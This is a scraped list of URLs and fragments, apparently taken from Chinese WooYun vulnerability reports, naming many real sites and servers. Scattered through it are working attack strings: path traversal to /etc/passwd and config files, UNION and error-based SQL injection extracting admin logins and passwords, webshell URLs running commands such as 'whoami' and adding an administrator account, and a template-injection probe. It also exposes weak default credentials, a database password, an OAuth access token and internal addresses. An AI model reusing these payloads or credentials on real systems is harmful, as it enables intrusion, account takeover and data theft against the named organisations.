http://123.127.198.90/f/test1.jsp http://hanjie.team.ccut.edu.cn/pic.asp?id=525&s_hh=200&w=2 http://sms.voole.com//resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd http://wap.voole.com//resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd http://**.**.**/_ http://**.**.**/script_ www.cnbl***** http://online.bizconf.cn/sys-login!customPage.action http://www.t-rex.cn/about.php?id=30 http://quanzi.zbj.com/main/view-qid-10470*.html http://quanzi.zbj.com/main/view/qid-10456* http://210.13.127.93/login.htm http://116.228.223.197/login.htm http://track.chiaus.cn/SysAdmin/ url:http://120.37.90.23:9201/ url:http://120.37.90.23:9200/ http://www.baozun.com:81/ http://book.weibo.com/newcms/tp_p4c22t65.html这个页面中的分享处,不过今天我说过不报CSRF了,所以这次是一次反射型的XSS。 http://book.weibo.com/newcms/i/weibo_send.php index.php/login/user_login http://**.**.**.**:2080/pms-service/section/content_list?cache=true&id=1408&keywords=APM&limit=18&portalId=14&start=0 http://**.**.**.**/en-us/support/search?query=aaa{{111%2b111}}bbb&xstart=8 http://dict-mobile.iciba.com/msg/index.php?act=ios&starttime=8&endtime=21&token=%3Cc2ea4faa+dc329a34+0b700118+74422130+fcb6fce5+ef1e1a09+16924da4+51f1a81d%3E&type=111&uid=×tamp=1459182467&client=3&sourceId=2&uuid=49A04CE5-A935-429A-BFEB-EF3BE0051529&v=8.3&sv=iPhoneOS9.3 http://lanxiniu.com/ https://github.com/eggfly/SAEProjects/blob/ca6b83abb59d2b2b39a0f24e4efda466325716c8/smsender/.svn/pristine/58/58a095cdf3cdce382bebf1411e65162362329718.svn-base http://esaytouch.app.jj.cn:8080/data/zip/page/querylanguagethemes?package_name=com.shere.assistivetouch&sort=-1&begin=-1&version_code=40506&language=cn&channel=xiaomi http://www.jiuxindai.com/) http://www.gold-shop.cn/ http://202.104.113.190/ http://202.104.113.190/distribution/ListVRetailDetail.do http://202.104.113.190 http://sns.maimaicha.com/company/guowai?category=baicha_ccs&page=102 http://www.easily-china.com/,图中链接存在漏洞 http://14.29.84.51:8080/system/login.action;jsessionid=E2EF2635C60A1F1C132038537D772C3A存在命令执行漏洞 http://**.**.**.**:8888/NEWEGSS/ http://**.**.**.**:8888/EGSS_User/ http://**.**.**.**:8888/EGSS_User/loginAction!login.action http://**.**.**.**:8888/EGSS_User/test.jsp http://**.**.**.**:8681/ http://**.**.**.** http://**.**.**.**:8888 http://**.**.**.**:8190 http://**.**.**.**:8080 http://**.**.**.**:8888 http://**.**.**.**/ http://**.**.**.** http://**.**.**.** http://**.**.**.**/ http://exp.zjxpp.com:8186/basisPlatform/loginAction!login.jspa http://hr.zjxpp.com:8186/basisPlatform/ http://exp.zjxpp.com:8186/examples/jsp http://exp.zjxpp.com:8186/examples/jsp/abc.jsp https://**.**.**.**/login https://passport.weibo.cn/forgot/forgot?entry=wapsso&from=0&vt=4 https://security.weibo.com/iforgot/setpwd?rand=一串hash https://security.weibo.com/iforgot/setpwd?rand=109c6538e90950669fca7b3ea310b633 http://www.chinazyjr.com/index.php?m=index&c=contactus&a=fileDown&pdfname=../../../etc/passwd http://www.chinazyjr.com/index.php?m=index&c=contactus&a=fileDown&pdfname=/application/config/database.php http://www.ivd-express.com/user/toHomeUI http://**.**.**.**/help.jspx jdbc:oracle:thin:@**.**.**.**:1521:orcl lady.mop.com/news/bencandy.php?fid=47&aid=908 http://115.159.56.188/admin/index.action jdbc:mysql://localhost:3306/mysql?useUnicode=true&characterEncoding=GBK jdbc:mysql://localhost:3306/mysql?useUnicode=true&characterEncoding=GBK jdbc:mysql://localhost:3306/mysql?useUnicode=true&characterEncoding=GBK http://bracelet-10003817.image.myqcloud.com/d90f65ce-5b0f-4cef-b426-96b3ace08925 http://bracelet-10003817.image.myqcloud.com/edfe890e-068e-44f7-9519-160c2511cd1c BIZ_USER_ID:8a035cb45383be4b0153a27177580363 http://bracelet-10003817.image.myqcloud.com/d90f65ce-5b0f-4cef-b426-96b3ace08925 http://219.142.54.176:9003/console/ http://219.142.54.182:8003/console/ http://219.142.54.178:8003/console/ http://123.127.198.92:7003/console/ http://ebusiness.minshenglife.com:8003/console/ http://monitor.bnu.edu.cn/graph_view.php?action=tree&tree_id=27 http://mrtg.bnu.edu.cn/ http://mail.okdai.com:8888/News/Search?id=7 http://web.95105899.com/silverfuture/live?roomid=90446472 http://dz.baidu.com/en/..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\/etc/sysconfig/network-scripts/ifcfg-eth1 https://vpn.crbank.com.cn http://121.14.65.92/ https://www.xiaoeyidai.com/?user&q=code/attestations/more https://www.xiaoeyidai.com/?user&q=code/attestations/list http://pss.csair.com/enableq/Android/FileUpload.php?optionID=1 php:a.jpg http://**.**.**.**/szpt/web/localpwd.jsp http://**.**.**.**/szpt/web/localpwd.jsp https://www.5aitou.com/register.htm http://wap.tianshijie.com.cn/appindex/index http://wap.tianshijie.com.cn/appindex/index http://121.14.6.93:8001/login.asp http://**.**.**.** http://**.**.**.**/mailcontrol/autoAlterTable.php?baseServer=**.**.**.**&database=todaymail&tableName=todaymail%20where%20updatexml%281,concat%280x23,version%28%29%29,1%29 http://**.**.**.** http://**.**.**.**/mailcontrol/autoAlterTable.php?baseServer=**.**.**.**&database=todaymail&tableName=todaymail%20where%20updatexml%281,concat%280x23,user%28%29%29,1%29 http://**.**.**.** http://**.**.**.**/mailcontrol/autoAlterTable.php?baseServer=**.**.**.**&database=todaymail&tableName=todaymail%20where%20updatexml%281,concat%280x23,user%28%29%29,1%29 http://dzswsw.yxk.ccut.edu.cn/pic.asp?id=468 http://m.rrs.com/snaplb/wikiManage/queryWikiContentList?moduleId=3&oneLevel=1&pageSize=9 http://123.125.123.26:8080 http://ir.361sport.com/html/ir_ann.php?year=2013 https://ksvpn.kingsoft.com/dana-na/auth/url_2/welcome.cgi https://ksvpn.kingsoft.com/,DanaInfo=admin.comment.iciba.com+index.php?mod=index&zid=14%27 www.iciba.com,成功访问,说明是可以访问的,但有些后台无法访问,但是也是个好消息。 https://github.com/wangxulin/portal_ops/blob/master/sites.json https://asset.ksops.com:8888 http://101.251.206.18:9080/nfsen/nfsen.php http://zabbix.liebaopay.com:9080/zabbix/dashboard.php http://manage.123.ksops.com http://101.251.206.18:9080/nfsen/nfsen.php https://mail.google.com/a/conew.com/#inbox http://211.157.162.253/ https://github.com/Jazzylol/learn/blob/853da337f5c484863ef33c86d750c8ec6e8293ad/HardWorking/src/main/java/learn/mail/WorkDaliyReport.java https://**.**.**.**/mer/ https://**.**.**.**/static/union/pages/index/index.html ftp://218.207.195.219:21 http://**.**.**.**/account/findPassword.html http://**.**.**.**/pjdetail/171386103482290176.html http://www.camel.com.cn/member/receive.aspx?receive_id=1000 http://www.camel.com.cn/member/receive.aspx?receive_id=10462 http://**.**.**.**/eap/ http://account.iqiyi.com/services/account/info.action?version=1.0.0&uid=1266760165&platform=iphone-iqiyi&access_code=huiyuan&platform_code=bb35a104d95490f6&mix=1&testMode=0 http://**.**.**.**/wa/wa/ma3.jsp?o=index jdbc:oracle:thin:@**.**.**.**:1521:utsz http://**.**.**/loginfrom=%2f_ http://**.**.**/loginfrom=%2f_ root:/roo***** bin:/sbi***** sbin:/sb***** adm:/sb***** lpd:/s***** sbin:/***** wn:/sbin:/s***** sbin:/***** uucp:/***** tor:/root:/***** gopher:/***** ftp:/s***** body:/:/s***** bus:/:/***** owner:/d***** abrt:/sb***** daemon:/:/***** ntp:/sbi***** SSH:/var/empty***** aemon:/:/s***** User:/***** ver:/var/lib/ng***** www:/***** Bcast:10.105.63.25***** ff:fe1a:***** http://cg.wasuitv.com:5555/login.aspx http://demo2.chenengdai.com:8100/使用的是tomcat,意外的发现是若口admin/123456 http://m2.etongdai.com:7001使用的时weblogic,而且还发现了存在弱口令:weblogic/weblogic1 http://bcy.net/party/expo/post/detail/2422/19199 http://www.10jqka.com.cn/gltface_for_lgt.php?uid=18554183 http://cosmetic.lady.163.com/ height:20px;BORDER http://helpdesk.app.jj.cn/api/chatMsg/receive?ks_uid=33615327&cid=87fc97afe901d296a56e601d099be083 http://erpview.5i5j.com/ http://whotel.jinjianginns.com/memberhubs1/order_show.htm?innerId=2076100 http://whotel.jinjianginns.com/memberhubs1/order_show.htm?innerId=2176100 http://whotel.jinjianginns.com/memberhubs1/order_show.htm?innerId=2000100 https://ifp.crbank.com.cn/cgi-bin/test-cgi encap:Ethernet F7:1D:4C:C0 addr:10.0.4.55 Bcast:10.0.4.255 Mask:255.255.255.0 f7ff:fe1d:4cc0/64 Scope:Link MTU:1500 packets:28142872 packets:13094815 http://api.huagu.com/answer/?page=1&pagesize=20 http://zyzc.com/yiti_more.php?Classid=19 http://zyzc.com/yiti_more.php?Classid=19&Cityid=&Mode=&pages= http://zyzc.com/yiti_more.php?Classid=19&Cityid=&Mode=&pages=2 http://zyzc.com/yiti_more.php?Classid=19&Cityid=&Mode=0 http://zyzc.com/yiti_more.php?Classid=19&Cityid=0 http://whotel.jinjianginns.com/ http://m.jinjianginns.com/ http://whotel.jinjianginns.com https://github.com/vspark/Python-scripts/blob/cc21c40777160fecaf3b1490a39f5bd666236be5/Python-study/sendemail.py http://**.**.**.**/ url:http://114.119.5.9/ http://114.119.5.9/mobile/support/appInfo/4.3.1?uid=1564470&appType=0 http://android.myapp.com/myapp/detail.htm?apkName=com.hexindai.hxd https://passport.bilibili.com/resetpwd/set?dopost=getpasswd&id=******&key=**************** https://**.**.**.**/vspark/Python-scripts/blob/cc21c40777160fecaf3b1490a39f5bd666236be5/Python-study/sendemail.py http://**.**.**.**/seeyon/main.do http://v6.bang.weibo.com/xmt/matrix?id=21000037&from=prov&from_id=31 http://helpdesk.app.jj.cn/api/user/login http://**.**.**.** http://14.215.133.167:8080/index.do http://14.215.133.168:8080/index.do http://14.215.133.167:8081/ http://**.**.**.** http://**.**.**.**/readme.txt http://**.**.**.**/ http://**.**.**.**/WriteWebService xmlns:i="http://**.**.**.**/2001/XMLSchema-instance xmlns:d="http://**.**.**.**/2001/XMLSchema xmlns:c="http://**.**.**.**/soap/encoding/ xmlns:v="http://**.**.**.**/soap/envelope/ http://**.**.**.**/ http://**.**.**.**/bbs.zip http://snsbroker.jinlb.cn/weixin/ordinary/customer/my/receive/ http://admin.1jiajie.com/v2/ http://www.ttkdex.com.hk/Page/CustomService/SiteMsg.aspx https://security.weibo.com/iforgot/setpwd?rand=xxx&v=xxx https://security.weibo.com http://www.jkwin.com.cn/ http://120.132.50.71:3306 www.lijiejie.com/xss.js www.lijiejie.com http://admin.wxb.com/index/feedback?page=1&is_replied=0 http://admin.wxb.com/index/feedback?page=1&is_replied=0 http://xz.giant.com.cn/upfile/ http://xz.giant.com.cn/upfile/dm.aspx http://xz.giant.com.cn/upfile/2014.aspx http://tplhksps.cntaiping.com/console/ http://tplhksps.cntaiping.com/f/test1.jsp jdbc:oracle:thin:@**.**.**.**:1521:ESSDEMO jdbc:oracle:thin:@**.**.**.**:1521:INDEDEMO xmlns:i="http://**.**.**.**/2001/XMLSchema-instance xmlns:d="http://**.**.**.**/2001/XMLSchema xmlns:c="http://**.**.**.**/soap/encoding/ xmlns:v="http://**.**.**.**/soap/envelope/ http://**.**.**.** n0:in0 xmlns:n0="http://**.**.**.** www.line0.com/ http://backend.line0.com/so/gotodetail.do?orderId=5992501&_=1459420689653 http://gjjm.zt.ccut.edu.cn/pic.asp?id=532&s_hh=200&w=1 http://office.lbxdrugs.com/seeyon/index.jsp bbc.taikang.com/QueryServlet http://docc.transgd.com.cn:7002 http://**.**.**.**/.svn/entries http://**.**.**.**/qqconnect/.svn/entries http://oms.bolo.me/ http://p.qq.com/s/FaaaElIL http://qt.vnnp.win/zfbwap/alipay http://a.zhanjds.com/qqwap/admin_页面 postgresql://58.220.5.143:7893 URL:http://try.fashion.sina.com.cn/home/api/?s=front&ie=utf-8&a=search&keyword=1&type=user&page=1&size=5&callback=HWFTypeBSTART&_=1459432378564 http://gmm.sdo.com/api/accountapi/goods?app_version=2.2.0.33&method=GetMyGoodsList¶ms=%7B%22goods_types%22%3A%220*%22%2C%22page%22%3A1%2C%22state%22%3A1%7D&src_code=8 http://gmm.sdo.com/api/accountapi/goods?src_code=8&app_version=2.2.0.33&method=GetMyGoodsList¶ms=%7B%22state%22:0,%22goods_types%22:%2210,12%22,%22page%22:1%7D https://webmail.ctrip.com/CookieAuth.dll?GetLogon?curl=Z2F&reason=2&formdir=1 http://182.92.105.50 http://182.92.105.50/zt-b.zip https://github.com/heroliu/Landscape/blob/f87d185610c84f68ef3c031e049cdd302606e5cf/testng.xml http://confluence.patsnap.com http://lx.leju.com http://lx.leju.com:80/tongji/lixiangtj?city=2&moban=&type=1&form_id=9 vpn.leju.com/admin web:http://10.207.0.180/ http://10.207.0.180/checkpwd.asp?ji=5&password=g00dPa%24%24w0rD&UserName=1 http://tthaofang.com/ http://**.**.**/bugs/wooyun-2016-0190700 https://**.**.** http://**.**.**/loginfrom=%2F_ https://**.**.**/prx/000/http/localhost/login/index.html_ http://**.**.**/_ http://**.**.** http://**.**.**/obrqemwn/index.jsp_ http://main.appstore.vivo.com.cn/rec/newapps?nt=WIFI&u=-57806365&;model=vivo+Y13iL&density=1.5&pictype=webp&elapsedtime=13993004&screensize=480_854&an=4.4.4&imei=868102024538774&app_version=622&type=2&av=19&cs=0&s=2%7C3511262971 https://www.baidu.com/s?ie=utf-8&f=8&rsv_bp=1&rsv_idx=1&tn=baidu&wd=site%3Ayun.baidu.com%20NearMe%20%E4%B8%AA%E5%88%86%E4%BA%AB&oq=site%3Ayun.baidu.com%20NearMe%20%E4%B8%AA%E5%88%86%E4%BA%AB&rsv_pq=fd75ab7600009c7e&rsv_t=92b20H7sCx6nQdjBqcAjZFOTZc5hVt0g9Nl0mUUER9C2i2r6CWRaA93Bdw4&rsv_enter=0 http://news.leju.com/api/data/gettaglists?category=1*&callback=_1459476097316824 http://news.leju.com/tag/ http://www.jinlinbao.com/?list_con/lm/222/id/-77%20union%20select%201,2,3,4,5,6,7,8,9,10,11,concat%280x3a,username,0x3a,password%29,13,14,15,16,17%20from+mx_user%20limit%201,1.html root:jlb20150123 http://www.jinlinbao.com/jlb http://www.jinlinbao.com/asset/mxupload/up0352604001459443106.php Name:admin Pass:admin http://121.14.65.123:8080/ https://**.**.**.**/oauth2/sso_authorize?client_id=2504490989&access_token=2.00_i6lvBv1Vc_Gd787877bd3V4v2kD&redirect_uri=http%3A%2F%2F**.**.**.**%2Fauth%2Flogin_success%2F&display=mobile&response_type=token&disable_sinaurl=1 http://**.**.**.**/spsp/login.do https://api.weibo.com/oauth2/sso_authorize?client_id=2504490989&access_token=2.00_i6lvBv1Vc_Gd787877bd3V4v2kD&redirect_uri=http%3A%2F%2Fapi.snssdk.com%2Fauth%2Flogin_success%2F&display=mobile&response_type=token&disable_sinaurl=1 http://yun.netentsec.com http://yun.netentsec.com/main/index/activation?from=ACTIVE_BY_URL&action=activation&t=3dce3f511744e6dbc649912325b7a118 http://180.76.169.198/baidu91/ http://180.76.169.198/baidu91/baidu91_charge.rar https://api.weibo.com/oauth2/sso_authorize?client_id=2504490989&access_token=2.00_i6lvBv1Vc_Gd787877bd3V4v2kD&redirect_uri=http%3A%2F%2Fapi.snssdk.com%2Fauth%2Flogin_success%2F&display=mobile&response_type=token&disable_sinaurl=1 http://yuedu.xunlei.com/?action=lists&cid=3&typeid=1 http://yuedu.xunlei.com/?action=lists&cid=3&typeid=1 http://www.saikr.com http://tangyuan.tom.com/ http://tangyuan.tom.com/redeem/gamecard.php http://yx.jinlianchu.com/.svn/entries http://monkey.zhanqi.tv/admin/#/access/login https://github.com/booleguo/sam-elle/blob/0b0684391a3bfd8df4b2e81535d370bdd87bdfc9/src/main/java/com/sam/yh/common/msg/UmsClientUtils.java http://gd.ums86.com:8899/sms/Api/Send.do http://j.m.leju.com/login http://**.**.**.**,有多家分公司 http://**.**.**.**/bugs/wooyun-2010-0134587 http://tong.duowan.com http://tong.duowan.com/userweb/faq_data_backup/201604/a.php http://**.**.**.**,有多家分公司 http://**.**.**.**/bugs/wooyun-2010-0134587 http://**.**.**.**/user_findpwd.php?t=email http://**.**.**.**/user_findpwd.php?t=doemail www.66666666.com http://3g.emaotai.cn/ uid:2183570524,微博小秘书uid:1642909335 http://direct.wap.zol.com.cn/ipj/readCalender/uploadRecord/ http://direct.wap.zol.com.cn/ipj/readCalender/uploadRecord http://beian.21vianet.com/sys/randomImg.action http://beian.21vianet.com/bak.jsp http://phy.ujn.edu.cn/wwwroot.rar http://phy.ujn.edu.cn/guanlihoutai/index.asp http://jzlq.lakala.com:7070/pos/index.php?action=login http://dev.game.gionee.com/.git http://www.weibo.com/p/aj/proxy?api=url http://contentrecommend.mobile.sina.cn@123.57.73.3/wb.php之类的url已经不行了,但使用http://contentrecommend.mobile.sina.cn.fakedomain.com http://**.**.**.**/hrm/resource/HrmResourceContactEdit.jsp?isfromtab=true&id=29%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,loginid,11,12,13,14,password,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121%20from%20HrmResourceManager%20where%20loginid=%27sysadmin%27&isView=1 http://**.**.**.**:812/login/Login.jsp?logintype=1 http://**.**.**.**:812/hrm/resource/HrmResourceContactEdit.jsp?isfromtab=true&id=29%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,loginid,11,12,13,14,password,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99%20from%20HrmResourceManager%20where%20loginid=%27sysadmin%27&isView=1 http://**.**.**.**/login/Login.jsp?logintype=1 http://**.**.**.**/hrm/resource/HrmResourceContactEdit.jsp?isfromtab=true&id=29%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,loginid,11,12,13,14,password,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99%20from%20HrmResourceManager%20where%20loginid=%27sysadmin%27&isView=1 http://**.**.**.**:18881/login/login.jsp http://**.**.**.**:18881/hrm/resource/HrmResourceContactEdit.jsp?isfromtab=true&id=88%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,loginid,11,12,13,14,password,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92%20from%20HrmResourceManager%20where%20loginid=%27sysadmin%27&isView=1 https://xiaolvyun.baidu.com/ https://xiaolvyun.baidu.com/abc123/icafe//planAndTrack/1122/edit?_=1459597042687 https://xiaolvyun.baidu.com/abc123/icafe//planAndTrack/2155/edit?_=1459597042687 https://xiaolvyun.baidu.com/abc123/icafe//planAndTrack/2159/edit?_=1459597042687 https://xiaolvyun.baidu.com/abc123/icafe//planAndTrack/1076/edit?_=1459597042687 https://xiaolvyun.baidu.com/abc123/icafe//planAndTrack/2157/edit?_=1459597042687 https://xiaolvyun.baidu.com/portal/member/dashboard?enterpriseName=test https://xiaolvyun.baidu.com/abc123/icafe/issue/1/showHierarchy?_=1459598259235 https://xiaolvyun.baidu.com/portal/member/dashboard?enterpriseName=iKafe http://123.196.123.21:8080/user/login.jsp http://123.196.123.21:8010/uddiexplorer/sss.jsp http://123.196.123.21:8010/uddiexplorer/out.jsp http://imo.iflytek.com/file/NDisk/write.php http://**.**.**.**/logon.jsp http://**.**.**.**/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector http://**.**.**.**/UserUpLoadFiles/Image/1111111118566090681/info.jsp http://**.**.**.**/general/vmeet/wbUpload.php?fileName=test.php+ http://**.**.**.**/general/vmeet/wbUpload/test.php localhost:3306 http://dpp.dangdang.com http://dpp.dangdang.com http://wooyun.org/bugs/wooyun-2016-0191864这个漏洞,就可以实现获取用户的Cookie,转发指定的微博,从而实现扩散式的传播。 index.php/payrecord/ index.php/login/user_login a4:3d:78:a0:3d:da","curr_version":"0","mac_addr":"1*","wk_password":"e","login_type":"wk_no www.weimob.com主站服务器: http://59.151.22.134/.svn/entries没设权限 http://59.151.22.134/i.php http://www.t.com http://home.t.com http://passport.t.com https://10.102.34.116:8443 http://i.t.com http://p.t.com http://img.t.com http://p01.t.com http://p02.t.com http://p03.t.com http://android.t.com http://img01.t.com http://corp.t.com http://wuliu.t.com http://ms.t.com:8880 http://pic.t.com http://search.t.com http://searchaddr.t.com http://sfvweb.sf-express.com/index.php?app=yxservicesoap&action=require_action http://10.103.16.18 http://cart.t.com http://10.102.36.175:8081 http://10.102.34.113:8080 http://m.sfbest.com http://fd.t.com/ http://stockservice.t.com http://activityservice.t.com http://orderapi.t.com:8080 http://10.102.36.151:8080 http://10.102.36.151:8088 http://10.102.36.151:8058 http://10.103.16.104:8010 http://10.102.36.183:8080 http://oa.asiainfo.com/console/login/LoginForm.jsp http://oa.asiainfo.com/bea_wls_internal/shell.jsp?o=vLogin jdbc:oracle:thin:@10.1.1.89:1521:prod TNS:listener http://211.152.48.115/login/index.xht http://pwccn.com/home/eng/rcs_info_security_2016.html?Category=PC&CategoryTitle=More%20contacts&MorePage=1 http://**.**.**.**/action/front/indexAction_prepareIndex http://**.**.**.**/SEMIS_DL/page/DoorPage/substance.aspx?action=aff&pId=1365176182 http://duiyi.sina.com.cn/iphone/news/news_view.htm?news_no=1551 http://www.10000kl.com/recharge/yeepay_recharge.asp http://www.jyceo.com/bd_lby.php?cid=65 http://www.ll7777.com/ http://www.ll7777.com/upload/201604/03/engout.php http://www.ll7777.com/upload/201604/03/Darkshell.php http://www.ll7777.com/index.php?r=order/create&sellId=151 http://weibo.com/ttarticle/p/show?id=2309403959482995611795 http://jiaoyuhuodong.pkufi.com/apply.php http://v2.mitime.com.cn/Conf/jsp/systembulletin/bulletinAction.do?operator=details http://v2.mitime.com.cn/cmd.jsp?cmd=net%20localgroup%20administrators%20wooyun%20/add http://180.97.187.30:8080/AdminMgr/backup/databackup.jsp http://192.168.100.4:3306|0|0 http://www.bestfenqi.com/ http://180.97.187.30:8080/dbbackup/backup/sea.jsp http://lady.mop.com/news/bencandy.php?fid=47&aid=908 www.88xgmm.com www.ao114.com www.jf14.com www.qj01.com www.88xgmm.com www.qj01.com http://video.baicmotor.com http://video.baicmotor.com/Conf/jsp/systembulletin/bulletinAction.do?operator=details&sysId=1%20order%20by%205 http://video.baicmotor.com/Conf/jsp/systembulletin/bulletinAction.do?operator=details&sysId=1%20order%20by%206 http://video.baicmotor.com/wooyun.jsp?cmd=whoami http://wap.5262.com/index/notice?action=list&mstatus=1 ftp://58.57.131.226/ ftp://58.57.131.226/%B8%F6%C8%CB_%CB%EF%BA%A3%CC%CE/VPN.txt https://ssl.slof.com/yqjs http://**.**.**.**/login.action http://v2.shenzhenair.com/ http://v2.shenzhenair.com/Conf/jsp/systembulletin/bulletinAction.do?operator=state&sysId=1 http://v2.shenzhenair.com/Conf/jsp/systembulletin/bulletinAction.do?operator=state&sysId=1%20order%20by%205 http://v2.shenzhenair.com/Conf/jsp/systembulletin/bulletinAction.do?operator=state&sysId=1%20order%20by%206 http://v2.shenzhenair.com/wooyun.jsp?cmd=whoami http://promotion.elong.com/other/about-web/web-addr.html http://efc.corp.elong.com/ host:192.168.116.64 http://www.test58static.com/html原型/ host:192.168.9.58 www.test58static.com http://ui.elong.com/ host:192.168.15.42 http://www.juneyaoair.com http://reci.zhenai.com/ http://reci.zhenai.com/reci.zhenai.com.rar http://reci.zhenai.com//zb_users/AVATAR/2.asp http://aihu.uhuacall.com:8088/index.php/runlog/feedback/index http://aihu.uhuacall.com:8088/index.php/runlog/feedback/index http://**.**.**/loginfrom=%2F_ Bcast:0.0.0***** fefe:9***** http://app.finance.ifeng.com/money/insurance_rs_detail.php?qtype=id&query=259 http://www.cheshi.com/c_ankang http://www.602.com:80/ www.602.com http://218.206.27.196:8788//bbs_show//images//upload//2016//04//03//web//193de376a03345c7a98d3693f02bf978.jsp http://218.206.27.196:8787/bbs_cms/system/login/init.action http://218.206.27.196:8787/bbs_cms/front/user/getUserInfoByID.action?userId=911a6a582f9049849d990ff85aa32ef7 id:d6ab8cc752e045b097639b11dd3a2e3c http://218.206.27.198:8080/city/api.php?op=platform&opCode=bandemail&method=account.mailActivate&email=aKvpxU1LekEffCesG4urtMAhPi5tijWqiHagNi1NqR0D46xF4GvjqbcMi0g&userId=8172049076684e6c985dac8b17721373&type=2 http://recordser.iflytek.com/ http://recordser.iflytek.com/UserContent/UserContentList http://recordser.iflytek.com/UserContent/UserList http://recordser.iflytek.com/UserContent/TaskList http://recordser.iflytek.com/InspectTask/UserList http://recordser.iflytek.com/InspectTask/TaskList http://recordser.iflytek.com/App/Index http://api.sina.cn/sinago/newuser.json?uid=dca2233cf7ec72e0&from=6049595012&wm=b207&new_uid=34b2e8f98ae54688f527885903b0aa17a54bfcdf&chwm=16094_0003&imei=355795053630675 http://pro.zhongjiu.cn/20141209/shouji/shouji.html http://api1.zhongjiu.cn/Order.checkAddress https://yun.netentsec.com/ http://push.wps.cn/wps_handpick_upd/?version=10.1.0.5559&distsrc=19.996 http://**.**.**.**/Website/newslist.jsp?ColumnCode=m0403 http://**.**.**.**/website/newsshowphoto.jsp?ColumnCode=l07 http://**.**.**.**/Website/contentshow.jsp?ColumnCode=m0301 http://**.**.**.**/Website/newslistm8001.jsp?ColumnCode=m8001 http://**.**.**.**/Website/newslistm0204.jsp?ColumnCode=m0204 http://**.**.**.**/Website/filelist.jsp?ColumnCode=02 http://123.125.123.62/zabbix/ http://video.baicmotor.com http://******/bugs/wooyun-2010-0143276 http://video.baicmotor.com/Conf/jsp/systembulletin/bulletinAction.do?operator=details&sysId=-1%20union%20select%201,user%28%29,3,version%28%29,5%23 http://223.72.160.7:8080/Conf/jsp/systembulletin/bulletinAction.do?operator=details&sysId=1 www.zcrj.org http://www.zcrj.org/1.asp http://**.**.**.**/bugs/wooyun-2010-0115201 classes:/root/zookeeper-3.4.6/bin/../build/lib/*.jar:/root/zookeeper-3.4.6/bin/../lib/slf4j-log4j12-1.6.1.jar:/root/zookeeper-3.4.6/bin/../lib/slf4j-api-1.6.1.jar:/root/zookeeper-3.4.6/bin/../lib/netty-3.7.0.Final.jar:/root/zookeeper-3.4.6/bin/../lib/log4j-1.2.16.jar:/root/zookeeper-3.4.6/bin/../lib/jline-0.9.94.jar:/root/zookeeper-3.4.6/bin/../zookeeper-3.4.6.jar:/root/zookeeper-3.4.6/bin/../src/java/lib/*.jar:/root/zookeeper-3.4.6/bin/../conf amd64:/usr/lib64:/lib64:/lib:/usr/lib www.ofo.so/Api/getPacket url:http://crashreport.yy.com/crashreport/crashreport.php http://219.143.252.170/seeyon//logs/login.log http://219.143.252.170/seeyon https://mail.ceair.com jdbc:oracle:thin:@172.28.28.44:1531:p**p http://172.20.35.70/FlightDataService.asmx http://172.20.29.64/FlightDataService.asmx?WSDL/getArrFlightInfo http://ceagent.ceair.com/ceagent/front/file/file-download!downloadFromServer.shtml?inputPath=/opt/appdata/file/ceagent/front/agency/../../../../../../../etc/httpd/conf/httpd.conf http://ceagent.ceair.com/ceagent/front/file/file-download!downloadFromServer.shtml?inputPath=/opt/appdata/file/ceagent/front/agency/../../../../../../../etc/passwd http://**.**.** https://mail.xdf.cn/owa/ http://www.webpowerasia.com/m/con.php?id=11 com:8888 pro.zhongjiu.cn/phone/20160219/s_sprgz.html&eurl=http%3A//pro.zhongjiu.cn/phone/20160323/s_mob.html&etime=1459748113&ctime=1459748381 http://api1.zhongjiu.cn/getSGList https://mail.qq.com/cgi-bin/mail_spam?action=check_link&url=http://XXXXXXX/?ADTAG=MAIL.2.000.287&mailid=FQkIfAQHAwkJBQMUCQEABAcFCAYHBR0BCQMGBgUIAAAC&spam=0 https://mail.qq.com/cgi-bin/mail_spam?action=check_link&url=http://www.baidu.com/?ADTAG=MAIL.2.000.287&mailid=FQkIfAQHAwkJBQMUCQEABAcFCAYHBR0BCQMGBgUIAAAC&spam=0 http://58.22.102.187/ http://e.1905.com/Wechatdev http://58.22.102.187/.git http://3g.mop.com/mobile.html FF:5A:F9:BF:FC:2F&netType=WIFI&netSubType= http://bb.mop.com/login.do http://**.**.**.** http://**.**.**.**/admin/ http://**.**.**.**/domainForm.do?domainId={域名ID http://211.151.133.195 https://portal.qiyi.domain/newportal/?appkey=all_racks http://211.151.133.195/plugin/getfile?name=../../../../../../etc/hosts&pluginId=3 http://211.151.133.195/plugin/getfile?name=../views.py&pluginId=3 http://quote.skyworth.com/Default.aspx http://c.cheyipai.com/admin/login http://124.250.37.126:8080/agent_portal/ http://**.**.**/bugs/wooyun-2016-0192133_ http://**.**.**/_ http://**.**.**/jeeadmin/jeecms/index.dolocale=zh_CN_ 